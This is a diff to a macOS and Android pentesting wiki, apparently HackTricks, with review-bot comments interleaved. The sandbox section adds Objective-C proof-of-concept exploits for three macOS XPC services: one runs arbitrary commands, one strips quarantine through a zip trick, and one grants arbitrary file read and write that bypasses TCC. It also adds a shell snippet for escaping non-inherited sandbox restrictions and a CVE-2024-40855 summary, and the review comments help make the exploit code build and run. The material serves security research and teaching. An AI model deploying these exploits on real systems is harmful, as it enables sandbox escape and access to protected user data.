@@ -59,6 +59,162 @@ If from then sandbox process you are able to **compromise other processes** runn
../../../macos-proces-abuse/
{{#endref}}
+### Available System and User Mach services
+
+The sandbox also allow to communicate with certain **Mach services** via XPC defined in the profile `application.sb`. If you are able to **abuse** one of these services you might be able to **escape the sandbox**.
+
+As indicated in [this writeup](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/), the info about Mach services is stored in `/System/Library/xpc/launchd.plist`. It's possible to find all the System and User Mach services by searching inside that file for `System` and `User`.
+
+Moreover, it's possible to check if a Mach service is available to a sandboxed application by calling the `bootstrap_look_up`:
+
+```objectivec
+void checkService(const char *serviceName) {
+ mach_port_t service_port = MACH_PORT_NULL;
+ kern_return_t err = bootstrap_look_up(bootstrap_port, serviceName, &service_port);
+ if (!err) {
+ NSLog(@"available service:%s", serviceName);
+ mach_port_deallocate(mach_task_self_, service_port);
+ }
+}
+
+void print_available_xpc(void) {
+ NSDictionary* dict = [NSDictionary dictionaryWithContentsOfFile:@"/System/Library/xpc/launchd.plist"];
+ NSDictionary* launchDaemons = dict[@"LaunchDaemons"];
+ for (NSString* key in launchDaemons) {
+ NSDictionary* job = launchDaemons[key];
+ NSDictionary* machServices = job[@"MachServices"];
+ for (NSString* serviceName in machServices) {
+ checkService(serviceName.UTF8String);
+ }
+ }
+}
+```
+
+### Available PID Mach services
+
+These Mach services were firstly abused to [escape from the sandbox in this writeup](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/). By that time, **all the XPC services required** by an application and its framework were visible in the app's PID domain (these are Mach Services with `ServiceType` as `Application`).
+
+In order to **contact a PID Domain XPC service**, it's just needed to register it inside the app with a line such as:
+
+```objectivec
+[[NSBundle bundleWithPath:@“/System/Library/PrivateFrameworks/ShoveService.framework"]load];
+```
+
+Moreover, It's possible to find all the **Application** Mach services by searching inside `System/Library/xpc/launchd.plist` for `Application`.
+
+Another way to find valid xpc services is to check the ones in:
+
+```bash
+find /System/Library/Frameworks -name "*.xpc"
+find /System/Library/PrivateFrameworks -name "*.xpc"
+```
+
+Several examples abusing this technique can be found in the [**original writeup**](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/), however, the following are some sumarized examples.
+
+#### /System/Library/PrivateFrameworks/StorageKit.framework/XPCServices/storagekitfsrunner.xpc
+
+This services allows every XPC connection by returning always `YES` and the method `runTask:arguments:withReply:` executes an arbitrary command with arbitrary params.
+
+The exploit was "as simple as":
+
+```objectivec
+@protocol SKRemoteTaskRunnerProtocol
+-(void)runTask:(NSURL *)task arguments:(NSArray *)args withReply:(void (^)(NSNumber *, NSError *))reply;
+@end
+
+void exploit_storagekitfsrunner(void) {
+ [[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/StorageKit.framework"] load];
+ NSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.storagekitfsrunner"];
+ conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(SKRemoteTaskRunnerProtocol)];
+ [conn setInterruptionHandler:^{NSLog(@"connection interrupted!");}];
+ [conn setInvalidationHandler:^{NSLog(@"connection invalidated!");}];
+ [conn resume];
+
+ [[conn remoteObjectProxy] runTask:[NSURL fileURLWithPath:@"/usr/bin/touch"] arguments:@[@"/tmp/sbx"] withReply:^(NSNumber *bSucc, NSError *error) {
+ NSLog(@"run task result:%@, error:%@", bSucc, error);
+ }];
+}
+```
+
+#### /System/Library/PrivateFrameworks/AudioAnalyticsInternal.framework/XPCServices/AudioAnalyticsHelperService.xpc
+
+This XPC service allowed every client bu always returning YES and the method `createZipAtPath:hourThreshold:withReply:` basically allowed to indicate the path to a folder to compress and it'll compress it in a ZIP file.
+
+Therefore, it's possible to generate a fake app folder structure, compress it, then decompress and execute it to escape the sandbox as the new files won't have the quarantine attribute.
+
+The exploit was:
+
+```objectivec
+@protocol AudioAnalyticsHelperServiceProtocol
+-(void)pruneZips:(NSString *)path hourThreshold:(int)threshold withReply:(void (^)(id *))reply;
+-(void)createZipAtPath:(NSString *)path hourThreshold:(int)threshold withReply:(void (^)(id *))reply;
+@end
+void exploit_AudioAnalyticsHelperService(void) {
+ NSString *currentPath = NSTemporaryDirectory();
+ chdir([currentPath UTF8String]);
+ NSLog(@"======== preparing payload at the current path:%@", currentPath);
+ system("mkdir -p compressed/poc.app/Contents/MacOS; touch 1.json");
+ [@"#!/bin/bash\ntouch /tmp/sbx\n" writeToFile:@"compressed/poc.app/Contents/MacOS/poc" atomically:YES encoding:NSUTF8StringEncoding error:0];
+ system("chmod +x compressed/poc.app/Contents/MacOS/poc");
+
+ [[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AudioAnalyticsInternal.framework"] load];
+ NSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.internal.audioanalytics.helper"];
+ conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(AudioAnalyticsHelperServiceProtocol)];
+ [conn resume];
+
+ [[conn remoteObjectProxy] createZipAtPath:currentPath hourThreshold:0 withReply:^(id *error){
+ NSDirectoryEnumerator *dirEnum = [[[NSFileManager alloc] init] enumeratorAtPath:currentPath];
+ NSString *file;
+ while ((file = [dirEnum nextObject])) {
+ if ([[file pathExtension] isEqualToString: @"zip"]) {
+ // open the zip
+ NSString *cmd = [@"open " stringByAppendingString:file];
+ system([cmd UTF8String]);
+
+ sleep(3); // wait for decompression and then open the payload (poc.app)
+ NSString *cmd2 = [NSString stringWithFormat:@"open /Users/%@/Downloads/%@/poc.app", NSUserName(), [file stringByDeletingPathExtension]];
+ system([cmd2 UTF8String]);
+ break;
+ }
+ }
+ }];
+}
+```
+
+#### /System/Library/PrivateFrameworks/WorkflowKit.framework/XPCServices/ShortcutsFileAccessHelper.xpc
+
+This XPC service allows to give read and write access to an arbitarry URL to the XPC client via the method `extendAccessToURL:completion:` which accepted any connection. As the XPC service has FDA, it's possible to abuse these permissions to bypass TCC completely.
+
+The exploit was:
+
+```objectivec
+@protocol WFFileAccessHelperProtocol
+- (void) extendAccessToURL:(NSURL *) url completion:(void (^) (FPSandboxingURLWrapper *, NSError *))arg2;
+@end
+typedef int (*PFN)(const char *);
+void expoit_ShortcutsFileAccessHelper(NSString *target) {
+ [[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/WorkflowKit.framework"]load];
+ NSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.WorkflowKit.ShortcutsFileAccessHelper"];
+ conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(WFFileAccessHelperProtocol)];
+ [conn.remoteObjectInterface setClasses:[NSSet setWithArray:@[[NSError class], objc_getClass("FPSandboxingURLWrapper")]] forSelector:@selector(extendAccessToURL:completion:) argumentIndex:0 ofReply:1];
+ [conn resume];
+
+ [[conn remoteObjectProxy] extendAccessToURL:[NSURL fileURLWithPath:target] completion:^(FPSandboxingURLWrapper *fpWrapper, NSError *error) {
+ NSString *sbxToken = [[NSString alloc] initWithData:[fpWrapper scope] encoding:NSUTF8StringEncoding];
+ NSURL *targetURL = [fpWrapper url];
+
+ void *h = dlopen("/usr/lib/system/libsystem_sandbox.dylib", 2);
+ PFN sandbox_extension_consume = (PFN)dlsym(h, "sandbox_extension_consume");
+ if (sandbox_extension_consume([sbxToken UTF8String]) == -1)
+ NSLog(@"Fail to consume the sandbox token:%@", sbxToken);
+ else {
+ NSLog(@"Got the file R&W permission with sandbox token:%@", sbxToken);
+ NSLog(@"Read the target content:%@", [NSData dataWithContentsOfURL:targetURL]);
+ }
+ }];
+}
+```
+
### Static Compiling & Dynamically linking
[**This research**](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/) discovered 2 ways to bypass the Sandbox. Because the sandbox is applied from userland when the **libSystem** library is loaded. If a binary could avoid loading it, it would never get sandboxed:
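Review bot: the `[[NSBundle bundleWithPath:@“/System/Library/PrivateFrameworks/ShoveService.framework"]load];` line in the PID-domain snippet opens the string with a typographic quote (`“`), so it will not compile as pasted; replace it with a plain `"`. In the same section the path `System/Library/xpc/launchd.plist` is missing its leading `/` (the earlier paragraph spells it `/System/Library/xpc/launchd.plist`). The Objective-C snippets also omit the headers a reader needs to build them (`<Foundation/Foundation.h>`, `<servers/bootstrap.h>` for `bootstrap_look_up`, `<dlfcn.h>` for `dlopen`/`dlsym`, `<objc/runtime.h>` for `objc_getClass`); a one-line note or the includes at the top of the first block would save readers a round of link errors. Spelling: "The sandbox also allow" → "allows", "sumarized" → "summarized", "This services allows" → "This service allows", "bu always returning" → "by always returning", "arbitarry" → "arbitrary", and the function name `expoit_ShortcutsFileAccessHelper` looks like a typo for `exploit_`.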
@@ -75,6 +231,27 @@ ld -o shell shell.o -macosx_version_min 13.0
ld: dynamic executables or dylibs must link with libSystem.dylib for architecture arm64
```
+### Not inherited restrictions
+
+As explined in the **[bonus of this writeup](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)** a sandbox restriction like:
+
+```
+(version 1)
+(allow default)
+(deny file-write* (literal "/private/tmp/sbx"))
+```
+
+can be bypassed by a new process executing for example:
+
+```bash
+mkdir -p /tmp/poc.app/Contents/MacOS
+echo '#!/bin/sh\n touch /tmp/sbx' > /tmp/poc.app/Contents/MacOS/poc
+chmod +x /tmp/poc.app/Contents/MacOS/poc
+open /tmp/poc.app
+```
+
+However, of course, this new process won't inherit entitlements or privileges from the parent process.
+
### Entitlements
Note that even if some **actions** might be **allowed by at he sandbox** if an application has an specific **entitlement**, like in:
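Review bot: in the `bash`-tagged block, `echo '#!/bin/sh\n touch /tmp/sbx' > ...` writes the characters `\n` literally, because bash's builtin `echo` does not interpret backslash escapes without `-e`, so the resulting `poc` file is a single malformed shebang line and nothing runs; use `printf '#!/bin/sh\ntouch /tmp/sbx\n' > /tmp/poc.app/Contents/MacOS/poc` (or a heredoc) instead. The prose would also benefit from saying why the restriction is not inherited: the payload is started with `open`, which asks LaunchServices to launch the bundle, so the new process is not a child of the restricted one and never receives its profile. Spelling: "explined" → "explained".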
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
index 433c14edd..2729a908a 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md
@@ -489,6 +489,14 @@ def create_dmg():
Check the **full exploit** in the [**original writeup**](https://theevilbit.github.io/posts/cve-2021-30808/).
+### CVE-2024-40855
+
+As explained in the [original writeup](https://www.kandji.io/blog/macos-audit-story-part2), this CVE abused `diskarbitrationd`.
+
+The function `DADiskMountWithArgumentsCommon` from the public `DiskArbitration` framework performed the security checks. However, it's possible to bypass it by directly calling `diskarbitrationd` and therefore use `../` elements in the path and symlinks.
+
+This allowed an attacker to do arbitrary mounts in any location, including over the TCC database due to the entitlement `com.apple.private.security.storage-exempt.heritable` of `diskarbitrationd`.
+
### asr
The tool **`/usr/sbin/asr`** allowed to copy the whole disk and mount it in another place bypassing TCC protections.
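Review bot: the new entry never states which macOS release fixed CVE-2024-40855 or how to recognise a patched host, so a reader cannot tell whether a given system is still exposed; add the fixed version from the linked writeup (or Apple's advisory) right under the `### CVE-2024-40855` heading, as the neighbouring CVE sections do. The second paragraph would also read more precisely as: the path validation lives in the client-side `DADiskMountWithArgumentsCommon`, so a client that talks to `diskarbitrationd` directly can pass paths containing `../` components and symlinks that the daemon does not re-check.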
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-users.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-users.md
index a18c0782c..b83f3783f 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-users.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-users.md
@@ -33,3 +33,5 @@ MacOS also support to login via external identity providers such as FaceBook, Go
Moreover, `accountsd` gets the list of account types from `/Library/Preferences/SystemConfiguration/com.apple.accounts.exists.plist`.
{{#include ../../banners/hacktricks-training.md}}
+
+
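Review bot: this hunk only appends two empty lines after the banner include, with no content change; that is trailing-whitespace noise and should be dropped from the change (a file needs at most one terminating newline).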
diff --git a/src/macos-hardening/macos-useful-commands.md b/src/macos-hardening/macos-useful-commands.md
index 53e6dc36e..5555716d7 100644
--- a/src/macos-hardening/macos-useful-commands.md
+++ b/src/macos-hardening/macos-useful-commands.md
@@ -148,3 +148,5 @@ Without prompts
{{#include ../banners/hacktricks-training.md}}
+
+
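Review bot: same as the previous file, this hunk adds nothing but two trailing blank lines after `{{#include ../banners/hacktricks-training.md}}`; drop it so the diff carries only real edits.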
diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md
index a3e0c503d..c5e8a0a8d 100644
--- a/src/mobile-pentesting/android-app-pentesting/README.md
+++ b/src/mobile-pentesting/android-app-pentesting/README.md
@@ -2,21 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
## Android Applications Basics
It's highly recommended to start reading this page to know about the **most important parts related to Android security and the most dangerous components in an Android application**:
@@ -231,21 +216,6 @@ content-protocol.md
---
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
---
## Dynamic Analysis
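Review bot: removing the sponsor block leaves the `---` at the top of the hunk and the `---` at the bottom separated by a single blank line, so the page now renders two consecutive horizontal rules just before `## Dynamic Analysis`; delete one of the two rules in this change.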
@@ -559,21 +529,6 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
---
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
## Automatic Analysis
### [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
@@ -783,6 +738,10 @@ Find a step-by-step guide to deobfuscate the apk in [https://blog.lexfo.fr/dexgu
You can upload an obfuscated APK to their platform.
+### [Deobfuscate android App]https://github.com/In3tinct/deobfuscate-android-app
+
+This is a LLM tool to find any potential security vulnerabilities in android apps and deobfuscate android app code. Uses Google's Gemini public API.
+
### [Simplify](https://github.com/CalebFenton/simplify)
It is a **generic android deobfuscator.** Simplify **virtually executes an app** to understand its behavior and then **tries to optimize the code** so it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn't matter what the specific type of obfuscation is used.
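Review bot: the heading `### [Deobfuscate android App]https://github.com/In3tinct/deobfuscate-android-app` is a broken markdown link, as the URL is not wrapped in parentheses; write it as `### [Deobfuscate Android App](https://github.com/In3tinct/deobfuscate-android-app)`, matching the neighbouring `### [Simplify](https://github.com/CalebFenton/simplify)`. In the description, "a LLM tool" → "an LLM tool" and "android" → "Android". Since the tool "Uses Google's Gemini public API", it is worth one sentence noting that the decompiled code is sent to a third-party service, which matters when the APK under test is confidential or covered by an engagement agreement.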
@@ -815,21 +774,6 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th
- [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
- [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md b/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
index b22ea3000..fe8a5153a 100644
--- a/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
+++ b/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
@@ -2,11 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
## **Method 1 – Bypassing with No Crypto Object Usage**
@@ -79,11 +74,6 @@ There are specialized tools and scripts designed to test and bypass authenticati
- [https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/](https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/)
-
-
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/mobile-pentesting/android-app-pentesting/content-protocol.md b/src/mobile-pentesting/android-app-pentesting/content-protocol.md
index 0c5c5a51d..896de67f0 100644
--- a/src/mobile-pentesting/android-app-pentesting/content-protocol.md
+++ b/src/mobile-pentesting/android-app-pentesting/content-protocol.md
@@ -1,8 +1,5 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-{% embed url="https://websec.nl/" %}
**This is a summary of the post [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)**
@@ -91,9 +88,6 @@ Proof-of-Concept HTML: